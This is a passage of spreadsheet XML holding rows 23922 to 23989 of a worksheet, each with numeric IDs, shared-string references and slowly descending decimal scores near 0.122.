      <c r="F23922" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23923" ht="15.75" customHeight="1">
      <c r="A23923" s="1">
        <v>26860.0</v>
      </c>
      <c r="B23923" s="2">
        <v>1.9035839E7</v>
      </c>
      <c r="C23923" s="2" t="s">
        <v>23057</v>
      </c>
      <c r="D23923" s="2">
        <v>1.0</v>
      </c>
      <c r="E23923" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23923" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23924" ht="15.75" customHeight="1">
      <c r="A23924" s="1">
        <v>27330.0</v>
      </c>
      <c r="B23924" s="2">
        <v>2.1421674E7</v>
      </c>
      <c r="C23924" s="2" t="s">
        <v>23058</v>
      </c>
      <c r="D23924" s="2">
        <v>1.0</v>
      </c>
      <c r="E23924" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23924" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23925" ht="15.75" customHeight="1">
      <c r="A23925" s="1">
        <v>27959.0</v>
      </c>
      <c r="B23925" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C23925" s="2" t="s">
        <v>23059</v>
      </c>
      <c r="D23925" s="2">
        <v>1.0</v>
      </c>
      <c r="E23925" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23925" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23926" ht="15.75" customHeight="1">
      <c r="A23926" s="1">
        <v>29192.0</v>
      </c>
      <c r="B23926" s="2">
        <v>3.07315E7</v>
      </c>
      <c r="C23926" s="2" t="s">
        <v>23060</v>
      </c>
      <c r="D23926" s="2">
        <v>1.0</v>
      </c>
      <c r="E23926" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23926" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23927" ht="15.75" customHeight="1">
      <c r="A23927" s="1">
        <v>29196.0</v>
      </c>
      <c r="B23927" s="2">
        <v>3.076095E7</v>
      </c>
      <c r="C23927" s="2" t="s">
        <v>23061</v>
      </c>
      <c r="D23927" s="2">
        <v>1.0</v>
      </c>
      <c r="E23927" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23927" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23928" ht="15.75" customHeight="1">
      <c r="A23928" s="1">
        <v>29562.0</v>
      </c>
      <c r="B23928" s="2">
        <v>3.3189185E7</v>
      </c>
      <c r="C23928" s="2" t="s">
        <v>23062</v>
      </c>
      <c r="D23928" s="2">
        <v>1.0</v>
      </c>
      <c r="E23928" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23928" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23929" ht="15.75" customHeight="1">
      <c r="A23929" s="1">
        <v>30013.0</v>
      </c>
      <c r="B23929" s="2">
        <v>3.61541E7</v>
      </c>
      <c r="C23929" s="2" t="s">
        <v>23063</v>
      </c>
      <c r="D23929" s="2">
        <v>1.0</v>
      </c>
      <c r="E23929" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23929" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23930" ht="15.75" customHeight="1">
      <c r="A23930" s="1">
        <v>30425.0</v>
      </c>
      <c r="B23930" s="2">
        <v>3.894059E7</v>
      </c>
      <c r="C23930" s="2" t="s">
        <v>23064</v>
      </c>
      <c r="D23930" s="2">
        <v>1.0</v>
      </c>
      <c r="E23930" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23930" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23931" ht="15.75" customHeight="1">
      <c r="A23931" s="1">
        <v>30596.0</v>
      </c>
      <c r="B23931" s="2">
        <v>4.1307376E7</v>
      </c>
      <c r="C23931" s="2" t="s">
        <v>23065</v>
      </c>
      <c r="D23931" s="2">
        <v>1.0</v>
      </c>
      <c r="E23931" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23931" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23932" ht="15.75" customHeight="1">
      <c r="A23932" s="1">
        <v>30634.0</v>
      </c>
      <c r="B23932" s="2">
        <v>4146266.0</v>
      </c>
      <c r="C23932" s="2" t="s">
        <v>23066</v>
      </c>
      <c r="D23932" s="2">
        <v>1.0</v>
      </c>
      <c r="E23932" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23932" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23933" ht="15.75" customHeight="1">
      <c r="A23933" s="1">
        <v>31594.0</v>
      </c>
      <c r="B23933" s="2">
        <v>5128698.0</v>
      </c>
      <c r="C23933" s="2" t="s">
        <v>23067</v>
      </c>
      <c r="D23933" s="2">
        <v>1.0</v>
      </c>
      <c r="E23933" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23933" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23934" ht="15.75" customHeight="1">
      <c r="A23934" s="1">
        <v>31824.0</v>
      </c>
      <c r="B23934" s="2">
        <v>5253711.0</v>
      </c>
      <c r="C23934" s="2" t="s">
        <v>23068</v>
      </c>
      <c r="D23934" s="2">
        <v>1.0</v>
      </c>
      <c r="E23934" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23934" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23935" ht="15.75" customHeight="1">
      <c r="A23935" s="1">
        <v>31846.0</v>
      </c>
      <c r="B23935" s="2">
        <v>5273629.0</v>
      </c>
      <c r="C23935" s="2" t="s">
        <v>23069</v>
      </c>
      <c r="D23935" s="2">
        <v>1.0</v>
      </c>
      <c r="E23935" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23935" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23936" ht="15.75" customHeight="1">
      <c r="A23936" s="1">
        <v>31974.0</v>
      </c>
      <c r="B23936" s="2">
        <v>5316476.0</v>
      </c>
      <c r="C23936" s="2" t="s">
        <v>23070</v>
      </c>
      <c r="D23936" s="2">
        <v>1.0</v>
      </c>
      <c r="E23936" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23936" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23937" ht="15.75" customHeight="1">
      <c r="A23937" s="1">
        <v>32238.0</v>
      </c>
      <c r="B23937" s="2">
        <v>5503812.0</v>
      </c>
      <c r="C23937" s="2" t="s">
        <v>23071</v>
      </c>
      <c r="D23937" s="2">
        <v>1.0</v>
      </c>
      <c r="E23937" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23937" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23938" ht="15.75" customHeight="1">
      <c r="A23938" s="1">
        <v>32807.0</v>
      </c>
      <c r="B23938" s="2">
        <v>6183771.0</v>
      </c>
      <c r="C23938" s="2" t="s">
        <v>23072</v>
      </c>
      <c r="D23938" s="2">
        <v>1.0</v>
      </c>
      <c r="E23938" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23938" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23939" ht="15.75" customHeight="1">
      <c r="A23939" s="1">
        <v>32837.0</v>
      </c>
      <c r="B23939" s="2">
        <v>6242244.0</v>
      </c>
      <c r="C23939" s="2" t="s">
        <v>23073</v>
      </c>
      <c r="D23939" s="2">
        <v>1.0</v>
      </c>
      <c r="E23939" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23939" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23940" ht="15.75" customHeight="1">
      <c r="A23940" s="1">
        <v>33103.0</v>
      </c>
      <c r="B23940" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C23940" s="2" t="s">
        <v>23074</v>
      </c>
      <c r="D23940" s="2">
        <v>1.0</v>
      </c>
      <c r="E23940" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23940" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23941" ht="15.75" customHeight="1">
      <c r="A23941" s="1">
        <v>33630.0</v>
      </c>
      <c r="B23941" s="2">
        <v>8358116.0</v>
      </c>
      <c r="C23941" s="2" t="s">
        <v>23075</v>
      </c>
      <c r="D23941" s="2">
        <v>1.0</v>
      </c>
      <c r="E23941" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23941" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23942" ht="15.75" customHeight="1">
      <c r="A23942" s="1">
        <v>3979.0</v>
      </c>
      <c r="B23942" s="2">
        <v>4.0833868E7</v>
      </c>
      <c r="C23942" s="2" t="s">
        <v>23076</v>
      </c>
      <c r="D23942" s="2">
        <v>1.0</v>
      </c>
      <c r="E23942" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23942" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="23943" ht="15.75" customHeight="1">
      <c r="A23943" s="1">
        <v>12457.0</v>
      </c>
      <c r="B23943" s="2">
        <v>2935081.0</v>
      </c>
      <c r="C23943" s="2" t="s">
        <v>23077</v>
      </c>
      <c r="D23943" s="2">
        <v>1.0</v>
      </c>
      <c r="E23943" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23943" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="23944" ht="15.75" customHeight="1">
      <c r="A23944" s="1">
        <v>22573.0</v>
      </c>
      <c r="B23944" s="2">
        <v>3.8615207E7</v>
      </c>
      <c r="C23944" s="2" t="s">
        <v>22989</v>
      </c>
      <c r="D23944" s="2">
        <v>1.0</v>
      </c>
      <c r="E23944" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23944" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="23945" ht="15.75" customHeight="1">
      <c r="A23945" s="1">
        <v>24709.0</v>
      </c>
      <c r="B23945" s="2">
        <v>1.1663104E7</v>
      </c>
      <c r="C23945" s="2" t="s">
        <v>23078</v>
      </c>
      <c r="D23945" s="2">
        <v>1.0</v>
      </c>
      <c r="E23945" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23945" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="23946" ht="15.75" customHeight="1">
      <c r="A23946" s="1">
        <v>25694.0</v>
      </c>
      <c r="B23946" s="2">
        <v>1.4528518E7</v>
      </c>
      <c r="C23946" s="2" t="s">
        <v>23079</v>
      </c>
      <c r="D23946" s="2">
        <v>1.0</v>
      </c>
      <c r="E23946" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23946" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="23947" ht="15.75" customHeight="1">
      <c r="A23947" s="1">
        <v>24518.0</v>
      </c>
      <c r="B23947" s="2">
        <v>1.1158689E7</v>
      </c>
      <c r="C23947" s="2" t="s">
        <v>23080</v>
      </c>
      <c r="D23947" s="2">
        <v>1.0</v>
      </c>
      <c r="E23947" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23947" s="2">
        <v>0.1231481481481482</v>
      </c>
    </row>
    <row r="23948" ht="15.75" customHeight="1">
      <c r="A23948" s="1">
        <v>4487.0</v>
      </c>
      <c r="B23948" s="2">
        <v>4.2513396E7</v>
      </c>
      <c r="C23948" s="2" t="s">
        <v>23081</v>
      </c>
      <c r="D23948" s="2">
        <v>1.0</v>
      </c>
      <c r="E23948" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23948" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="23949" ht="15.75" customHeight="1">
      <c r="A23949" s="1">
        <v>25095.0</v>
      </c>
      <c r="B23949" s="2">
        <v>1.2923559E7</v>
      </c>
      <c r="C23949" s="2" t="s">
        <v>22997</v>
      </c>
      <c r="D23949" s="2">
        <v>1.0</v>
      </c>
      <c r="E23949" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23949" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="23950" ht="15.75" customHeight="1">
      <c r="A23950" s="1">
        <v>25701.0</v>
      </c>
      <c r="B23950" s="2">
        <v>1.4529938E7</v>
      </c>
      <c r="C23950" s="2" t="s">
        <v>23082</v>
      </c>
      <c r="D23950" s="2">
        <v>1.0</v>
      </c>
      <c r="E23950" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23950" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="23951" ht="15.75" customHeight="1">
      <c r="A23951" s="1">
        <v>31476.0</v>
      </c>
      <c r="B23951" s="2">
        <v>5.0486608E7</v>
      </c>
      <c r="C23951" s="2" t="s">
        <v>23083</v>
      </c>
      <c r="D23951" s="2">
        <v>1.0</v>
      </c>
      <c r="E23951" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23951" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="23952" ht="15.75" customHeight="1">
      <c r="A23952" s="1">
        <v>31825.0</v>
      </c>
      <c r="B23952" s="2">
        <v>5253711.0</v>
      </c>
      <c r="C23952" s="2" t="s">
        <v>23084</v>
      </c>
      <c r="D23952" s="2">
        <v>1.0</v>
      </c>
      <c r="E23952" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23952" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="23953" ht="15.75" customHeight="1">
      <c r="A23953" s="1">
        <v>22091.0</v>
      </c>
      <c r="B23953" s="2">
        <v>3.0766179E7</v>
      </c>
      <c r="C23953" s="2" t="s">
        <v>23085</v>
      </c>
      <c r="D23953" s="2">
        <v>1.0</v>
      </c>
      <c r="E23953" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23953" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="23954" ht="15.75" customHeight="1">
      <c r="A23954" s="1">
        <v>22705.0</v>
      </c>
      <c r="B23954" s="2">
        <v>4.2740516E7</v>
      </c>
      <c r="C23954" s="2" t="s">
        <v>23086</v>
      </c>
      <c r="D23954" s="2">
        <v>1.0</v>
      </c>
      <c r="E23954" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23954" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="23955" ht="15.75" customHeight="1">
      <c r="A23955" s="1">
        <v>24040.0</v>
      </c>
      <c r="B23955" s="2">
        <v>9509717.0</v>
      </c>
      <c r="C23955" s="2" t="s">
        <v>23087</v>
      </c>
      <c r="D23955" s="2">
        <v>1.0</v>
      </c>
      <c r="E23955" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23955" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="23956" ht="15.75" customHeight="1">
      <c r="A23956" s="1">
        <v>27999.0</v>
      </c>
      <c r="B23956" s="2">
        <v>2.4248341E7</v>
      </c>
      <c r="C23956" s="2" t="s">
        <v>23088</v>
      </c>
      <c r="D23956" s="2">
        <v>1.0</v>
      </c>
      <c r="E23956" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23956" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="23957" ht="15.75" customHeight="1">
      <c r="A23957" s="1">
        <v>30228.0</v>
      </c>
      <c r="B23957" s="2">
        <v>3.7432788E7</v>
      </c>
      <c r="C23957" s="2" t="s">
        <v>23089</v>
      </c>
      <c r="D23957" s="2">
        <v>1.0</v>
      </c>
      <c r="E23957" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23957" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="23958" ht="15.75" customHeight="1">
      <c r="A23958" s="1">
        <v>33677.0</v>
      </c>
      <c r="B23958" s="2">
        <v>8425292.0</v>
      </c>
      <c r="C23958" s="2" t="s">
        <v>23090</v>
      </c>
      <c r="D23958" s="2">
        <v>1.0</v>
      </c>
      <c r="E23958" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23958" s="2">
        <v>0.1223958333333334</v>
      </c>
    </row>
    <row r="23959" ht="15.75" customHeight="1">
      <c r="A23959" s="1">
        <v>23437.0</v>
      </c>
      <c r="B23959" s="2">
        <v>5.6650734E7</v>
      </c>
      <c r="C23959" s="2" t="s">
        <v>22844</v>
      </c>
      <c r="D23959" s="2">
        <v>1.0</v>
      </c>
      <c r="E23959" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23959" s="2">
        <v>0.1222222222222223</v>
      </c>
    </row>
    <row r="23960" ht="15.75" customHeight="1">
      <c r="A23960" s="1">
        <v>13559.0</v>
      </c>
      <c r="B23960" s="2">
        <v>3.5659268E7</v>
      </c>
      <c r="C23960" s="2" t="s">
        <v>23091</v>
      </c>
      <c r="D23960" s="2">
        <v>1.0</v>
      </c>
      <c r="E23960" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23960" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="23961" ht="15.75" customHeight="1">
      <c r="A23961" s="1">
        <v>20971.0</v>
      </c>
      <c r="B23961" s="2">
        <v>1.6813918E7</v>
      </c>
      <c r="C23961" s="2" t="s">
        <v>23092</v>
      </c>
      <c r="D23961" s="2">
        <v>1.0</v>
      </c>
      <c r="E23961" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23961" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="23962" ht="15.75" customHeight="1">
      <c r="A23962" s="1">
        <v>23371.0</v>
      </c>
      <c r="B23962" s="2">
        <v>5.5248152E7</v>
      </c>
      <c r="C23962" s="2" t="s">
        <v>23093</v>
      </c>
      <c r="D23962" s="2">
        <v>1.0</v>
      </c>
      <c r="E23962" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23962" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="23963" ht="15.75" customHeight="1">
      <c r="A23963" s="1">
        <v>24338.0</v>
      </c>
      <c r="B23963" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C23963" s="2" t="s">
        <v>23094</v>
      </c>
      <c r="D23963" s="2">
        <v>1.0</v>
      </c>
      <c r="E23963" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23963" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="23964" ht="15.75" customHeight="1">
      <c r="A23964" s="1">
        <v>26352.0</v>
      </c>
      <c r="B23964" s="2">
        <v>1.6813917E7</v>
      </c>
      <c r="C23964" s="2" t="s">
        <v>23092</v>
      </c>
      <c r="D23964" s="2">
        <v>1.0</v>
      </c>
      <c r="E23964" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23964" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="23965" ht="15.75" customHeight="1">
      <c r="A23965" s="1">
        <v>30066.0</v>
      </c>
      <c r="B23965" s="2">
        <v>3625178.0</v>
      </c>
      <c r="C23965" s="2" t="s">
        <v>22747</v>
      </c>
      <c r="D23965" s="2">
        <v>1.0</v>
      </c>
      <c r="E23965" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23965" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="23966" ht="15.75" customHeight="1">
      <c r="A23966" s="1">
        <v>31694.0</v>
      </c>
      <c r="B23966" s="2">
        <v>5192522.0</v>
      </c>
      <c r="C23966" s="2" t="s">
        <v>23095</v>
      </c>
      <c r="D23966" s="2">
        <v>1.0</v>
      </c>
      <c r="E23966" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23966" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="23967" ht="15.75" customHeight="1">
      <c r="A23967" s="1">
        <v>32937.0</v>
      </c>
      <c r="B23967" s="2">
        <v>6461197.0</v>
      </c>
      <c r="C23967" s="2" t="s">
        <v>23096</v>
      </c>
      <c r="D23967" s="2">
        <v>1.0</v>
      </c>
      <c r="E23967" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23967" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="23968" ht="15.75" customHeight="1">
      <c r="A23968" s="1">
        <v>33629.0</v>
      </c>
      <c r="B23968" s="2">
        <v>8356117.0</v>
      </c>
      <c r="C23968" s="2" t="s">
        <v>23097</v>
      </c>
      <c r="D23968" s="2">
        <v>1.0</v>
      </c>
      <c r="E23968" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23968" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="23969" ht="15.75" customHeight="1">
      <c r="A23969" s="1">
        <v>28217.0</v>
      </c>
      <c r="B23969" s="2">
        <v>2.5054796E7</v>
      </c>
      <c r="C23969" s="2" t="s">
        <v>23098</v>
      </c>
      <c r="D23969" s="2">
        <v>1.0</v>
      </c>
      <c r="E23969" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23969" s="2">
        <v>0.122093023255814</v>
      </c>
    </row>
    <row r="23970" ht="15.75" customHeight="1">
      <c r="A23970" s="1">
        <v>23188.0</v>
      </c>
      <c r="B23970" s="2">
        <v>5.233632E7</v>
      </c>
      <c r="C23970" s="2" t="s">
        <v>23099</v>
      </c>
      <c r="D23970" s="2">
        <v>1.0</v>
      </c>
      <c r="E23970" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23970" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="23971" ht="15.75" customHeight="1">
      <c r="A23971" s="1">
        <v>15504.0</v>
      </c>
      <c r="B23971" s="2">
        <v>4.3216474E7</v>
      </c>
      <c r="C23971" s="2" t="s">
        <v>23100</v>
      </c>
      <c r="D23971" s="2">
        <v>1.0</v>
      </c>
      <c r="E23971" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23971" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="23972" ht="15.75" customHeight="1">
      <c r="A23972" s="1">
        <v>21663.0</v>
      </c>
      <c r="B23972" s="2">
        <v>2.5006412E7</v>
      </c>
      <c r="C23972" s="2" t="s">
        <v>23101</v>
      </c>
      <c r="D23972" s="2">
        <v>1.0</v>
      </c>
      <c r="E23972" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23972" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="23973" ht="15.75" customHeight="1">
      <c r="A23973" s="1">
        <v>23294.0</v>
      </c>
      <c r="B23973" s="2">
        <v>5387913.0</v>
      </c>
      <c r="C23973" s="2" t="s">
        <v>23102</v>
      </c>
      <c r="D23973" s="2">
        <v>1.0</v>
      </c>
      <c r="E23973" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23973" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="23974" ht="15.75" customHeight="1">
      <c r="A23974" s="1">
        <v>29255.0</v>
      </c>
      <c r="B23974" s="2">
        <v>3.0921702E7</v>
      </c>
      <c r="C23974" s="2" t="s">
        <v>23103</v>
      </c>
      <c r="D23974" s="2">
        <v>1.0</v>
      </c>
      <c r="E23974" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23974" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="23975" ht="15.75" customHeight="1">
      <c r="A23975" s="1">
        <v>31525.0</v>
      </c>
      <c r="B23975" s="2">
        <v>5088686.0</v>
      </c>
      <c r="C23975" s="2" t="s">
        <v>23104</v>
      </c>
      <c r="D23975" s="2">
        <v>1.0</v>
      </c>
      <c r="E23975" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23975" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="23976" ht="15.75" customHeight="1">
      <c r="A23976" s="1">
        <v>33255.0</v>
      </c>
      <c r="B23976" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C23976" s="2" t="s">
        <v>23105</v>
      </c>
      <c r="D23976" s="2">
        <v>1.0</v>
      </c>
      <c r="E23976" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23976" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="23977" ht="15.75" customHeight="1">
      <c r="A23977" s="1">
        <v>30779.0</v>
      </c>
      <c r="B23977" s="2">
        <v>4.4739123E7</v>
      </c>
      <c r="C23977" s="2" t="s">
        <v>23106</v>
      </c>
      <c r="D23977" s="2">
        <v>1.0</v>
      </c>
      <c r="E23977" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23977" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="23978" ht="15.75" customHeight="1">
      <c r="A23978" s="1">
        <v>33257.0</v>
      </c>
      <c r="B23978" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C23978" s="2" t="s">
        <v>23107</v>
      </c>
      <c r="D23978" s="2">
        <v>1.0</v>
      </c>
      <c r="E23978" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23978" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="23979" ht="15.75" customHeight="1">
      <c r="A23979" s="1">
        <v>19633.0</v>
      </c>
      <c r="B23979" s="2">
        <v>5.6278179E7</v>
      </c>
      <c r="C23979" s="2" t="s">
        <v>23108</v>
      </c>
      <c r="D23979" s="2">
        <v>1.0</v>
      </c>
      <c r="E23979" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23979" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="23980" ht="15.75" customHeight="1">
      <c r="A23980" s="1">
        <v>20763.0</v>
      </c>
      <c r="B23980" s="2">
        <v>1.4927035E7</v>
      </c>
      <c r="C23980" s="2" t="s">
        <v>23109</v>
      </c>
      <c r="D23980" s="2">
        <v>1.0</v>
      </c>
      <c r="E23980" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23980" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="23981" ht="15.75" customHeight="1">
      <c r="A23981" s="1">
        <v>20815.0</v>
      </c>
      <c r="B23981" s="2">
        <v>1.5339367E7</v>
      </c>
      <c r="C23981" s="2" t="s">
        <v>22966</v>
      </c>
      <c r="D23981" s="2">
        <v>1.0</v>
      </c>
      <c r="E23981" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23981" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="23982" ht="15.75" customHeight="1">
      <c r="A23982" s="1">
        <v>21604.0</v>
      </c>
      <c r="B23982" s="2">
        <v>2.4335314E7</v>
      </c>
      <c r="C23982" s="2" t="s">
        <v>23110</v>
      </c>
      <c r="D23982" s="2">
        <v>1.0</v>
      </c>
      <c r="E23982" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23982" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="23983" ht="15.75" customHeight="1">
      <c r="A23983" s="1">
        <v>24950.0</v>
      </c>
      <c r="B23983" s="2">
        <v>1.2555861E7</v>
      </c>
      <c r="C23983" s="2" t="s">
        <v>23111</v>
      </c>
      <c r="D23983" s="2">
        <v>1.0</v>
      </c>
      <c r="E23983" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23983" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="23984" ht="15.75" customHeight="1">
      <c r="A23984" s="1">
        <v>11639.0</v>
      </c>
      <c r="B23984" s="2">
        <v>2.3188192E7</v>
      </c>
      <c r="C23984" s="2" t="s">
        <v>23112</v>
      </c>
      <c r="D23984" s="2">
        <v>1.0</v>
      </c>
      <c r="E23984" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23984" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="23985" ht="15.75" customHeight="1">
      <c r="A23985" s="1">
        <v>20310.0</v>
      </c>
      <c r="B23985" s="2">
        <v>1.1383925E7</v>
      </c>
      <c r="C23985" s="2" t="s">
        <v>23113</v>
      </c>
      <c r="D23985" s="2">
        <v>1.0</v>
      </c>
      <c r="E23985" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23985" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="23986" ht="15.75" customHeight="1">
      <c r="A23986" s="1">
        <v>22363.0</v>
      </c>
      <c r="B23986" s="2">
        <v>3.4850969E7</v>
      </c>
      <c r="C23986" s="2" t="s">
        <v>23114</v>
      </c>
      <c r="D23986" s="2">
        <v>1.0</v>
      </c>
      <c r="E23986" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23986" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="23987" ht="15.75" customHeight="1">
      <c r="A23987" s="1">
        <v>24510.0</v>
      </c>
      <c r="B23987" s="2">
        <v>1.1134157E7</v>
      </c>
      <c r="C23987" s="2" t="s">
        <v>23115</v>
      </c>
      <c r="D23987" s="2">
        <v>1.0</v>
      </c>
      <c r="E23987" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23987" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="23988" ht="15.75" customHeight="1">
      <c r="A23988" s="1">
        <v>25038.0</v>
      </c>
      <c r="B23988" s="2">
        <v>1.2844263E7</v>
      </c>
      <c r="C23988" s="2" t="s">
        <v>23116</v>
      </c>
      <c r="D23988" s="2">
        <v>1.0</v>
      </c>
      <c r="E23988" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23988" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="23989" ht="15.75" customHeight="1">
      <c r="A23989" s="1">
        <v>26069.0</v>
      </c>
      <c r="B23989" s="2">
        <v>1.5577931E7</v>
      </c>
      <c r="C23989" s="2" t="s">
        <v>23117</v>
      </c>
      <c r="D23989" s="2">
        <v>1.0</v>
      </c>
      <c r="E23989" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23989" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
